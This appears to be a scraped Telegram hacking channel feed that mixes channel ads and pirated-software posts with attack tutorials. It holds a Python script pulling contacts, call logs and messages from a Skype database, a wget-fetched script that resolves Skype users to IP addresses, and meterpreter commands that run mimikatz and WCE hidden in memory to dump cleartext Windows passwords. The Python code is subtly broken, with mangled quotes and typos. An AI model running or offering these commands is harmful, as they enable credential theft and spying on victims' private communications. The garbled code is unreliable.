💡💡💡💡💡💡💡💡💡💡💡💡💡
🔦FACTS that will make you go crazy
💡Daily Dose of Amazing and mind boggling Facts.
Join @FactsFever
https://t.me/joinchat/AAAAAEQSP6HoKqqTpeiG6Q
Readiris Pro 16.0.2 build 9592 / Corporate 16.0.2 build 9591 Multilangual
Readiris 16 for Windows is an optical character recognition (OCR) software package that converts an image, a PDF file, or a scanned document into a fully editable text file. Thanks to the power and accuracy of its recognition engine, Readiris 16 for Windows extracts the text from your documents with precision while preserving the layout of the original file.
Telegram.me/globalkosreborn
🗳 Someone requested the Repost of Premium Slowdns video starting from installation, how many of you are in to that?
👍 [52]
❌ [5]
👥 57 people have voted so far
🚫 This poll is closed...
USE OF SCRIPT:
chmod +x scriptname
./scriptname.py -p path of D.B. according to your O.s.
TUTORIAL 2: SKYPE RESOLVER BASH SCRIPT
This is simple bash script which query skype username against http://resolveme.org/ and grab I.P.
wget https://raw2.github.com/niravkdesai/skypersolver.sh/master/skypersolver.sh
sh skypersolver.sh
NOTE: ALL TUTORIALS ARE FOR EDUCATIONAL PURPOSES, ANY INTENT TO USE ILLEGALLY OR MALICIOUSLY IS AT YOUR OWN RISK AND WE ARE NOT TO BE HELD LIABLE FOR ANY ACTIONS PERTAINING TO THE INFORMATION POSTED.
Читать полностью…Watch "TELNET PROTOCAL,FILE TRANSFER (FREE INTERNET)" on YouTube
https://youtu.be/oR5zPlm9k5M
Telegram X 5.0.1 (230) #Swift #Beta for iOS 8.0+
MD5:_1bde2fed26340c463da0a67472260d69
Telegram.me/globalkosreborn
🆕 New API change, live locations, bug fixes.
To our Indian brethren subscribers: Happy Republic day
India became an Independent Nation on 15th August, 1947. On 26th January, 1950 India was formally declared Republic.
Telegram.me/globalkosreborn
Techsmith Snagit - The award-winning screen-capture software. Using SnagIt, you can select and capture anything on your screen, then easily add text, arrows, or effects, and save the capture to a file or share it immediately by e-mail or IM. Capture and share an article, image, or Web page directly from your screen. Or, capture and share any part of any application that runs on your PC. Automatically save in one of 23 file formats, or send to the printer, to your e-mail, or to the clipboard
System Requirements:
- Microsoft Windows 10, Windows 8 or Windows 7 (32-bit or 64-bit editions)
- Intel Core 2 Duo, or AMD Athlon x2 Dual-Core processor
- 2 GB RAM (8 GB or more recommended)
- 500 MB hard disk space
- 3D Graphics accelerator card with OpenGL version 1.4 (OpenGL version 3.2 or better recommended)
- 1280 x 768 screen resolution (1920 x 1080 (Full HD) recommended)
- Mouse or tablet
- CD-ROM drive for installation from CD
Telegram.me/globalkosreborn
💡💡💡💡💡💡💡💡💡💡💡💡💡
🔦FACTS that will make you go crazy
💡Daily Dose of Amazing and mind boggling Facts.
Join @FactsFever
https://t.me/joinchat/AAAAAEQSP6HoKqqTpeiG6Q
EXTRACT CONTACTS ;CALL LOG; MESSAGE FROM SKYPE DATABASE.
Skype is popular chat utility which store user data in sqlite format in user`s computer.Database name is main.db & it contain Contacts;LegacyMessages;Calls;Accounts;Transfers;Voicemails;Chats;Messages;ContactGroups;Video
;SMS;CallMembers;ChatMembers;Conversations and lot more.Location of database in different operating system is
In windows C:\\Users\user_name\AppData\Roaming\Skype\skype_user_name
In mac Users/user_name/Library//Application/Support/Skype/skype_user_name
In Linux /root/.Skype/skype_user_name
This python script extract user profile ;call log; contacts & messages from database. But if you want to extract other things which are stored in main.db then you can add simple function to script.
#!/usr/bin/python
import sqlite3
import optparse
import os
def printProfile(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute(“SELECT fullname, skypename, city, country, \
datetime(profile_timestamp,’unixepoch’) FROM Accounts;”)
for row in c:
print ‘[*] — Found Account –‘
print ‘[+] User : ‘+str(row[0])
print ‘[+] Skype Username : ‘+str(row[1])
print ‘[+] Location : ‘+str(row[2])+’,’+str(row[3])
print ‘[+] Profile Date : ‘+str(row[4])
def printContacts(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute(“SELECT displayname, skypename, city, country,\
phone_mobile, birthday FROM Contacts;”)
for row in c:
print ‘\n[*] — Found Contact –‘
print ‘[+] User : ‘ + str(row[0])
print ‘[+] Skype Username : ‘ + str(row[1])
if str(row[2]) != ” and str(row[2]) != ‘None’:
print ‘[+] Location : ‘ + str(row[2]) + ‘,’ \
+ str(row[3])
if str(row[4]) != ‘None’:
print ‘[+] Mobile Number : ‘ + str(row[4])
if str(row[5]) != ‘None’:
print ‘[+] Birthday : ‘ + str(row[5])
def printCallLog(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute(“SELECT datetime(begin_timestamp,’unixepoch’), \
identity FROM calls, conversations WHERE \
calls.conv_dbid = conversations.id;”
)
print ‘\n[*] — Found Calls –‘
for row in c:
print ‘[+] Time: ‘+str(row[0])+\
‘ | Partner: ‘+ str(row[1])
def printMessages(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute(“SELECT datetime(timestamp,’unixepoch’), \
dialog_partner, author, body_xml FROM Messages;”)
print ‘\n[*] — Found Messages –‘
for row in c:
try:
if ‘partlist’ not in str(row[3]):
if str(row[1]) != str(row[2]):
msgDirection = ‘To ‘ + str(row[1]) + ‘: ‘
else:
msgDirection = ‘From ‘ + str(row[2]) + ‘ : ‘
print ‘Time: ‘ + str(row[0]) + ‘ ‘ \
+ msgDirection + str(row[3])
except:
pass
def main():
parser = optparse.OptionParser(“usage %prog “+\
“-p “)
parser.add_option(‘-p’, dest=’pathName’, type=’string’,\
help=’specify skype profile path’)
(options, args) = parser.parse_args()
pathName = options.pathName
if pathName == None:
print parser.usage
exit(0)
elif os.path.isdir(pathName) == False:
print ‘[!] Path Does Not Exist: ‘ + pathName
exit(0)
else:
skypeDB = os.path.join(pathName, ‘main.db’)
if os.path.isfile(skypeDB):
printProfile(skypeDB)
printContacts(skypeDB)
printCallLog(skypeDB)
printMessages(skypeDB)
else:
print ‘[!] Skype Database ‘+\
‘does not exist: ‘ + skpeDB
if name == ‘__main__’:
main()
DIFFERENT METHODS TO GET CLEAR TEXT WINDOWS PASSWORDS.
Get clear text password:-
Following are different methods to get clear text password of windows from metasploit.
(1)using mimikatz or wce get clear text password of victim.
(2) You can also use mimikatz password dump method .
(3)You can also use mimikatz meterpreter plugin.
meterpreter > load mimikatz
meterpreter > help mimikatz
meterpreter > kerberos
meterpreter > mimikatz_command -h
meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a “full”
(4)You can use wce & mimikatz in memory without uploading binary.
(a)WCE in memory:-
cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a “-o foo.txt”
cat foo.txt
(b)Mimikatz in memory:-
cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a ‘”sekurlsa::logonPasswords full” exit’
Whoever is expecting something you wait till i drop it it here...forbearance is what i need from you forks
Читать полностью…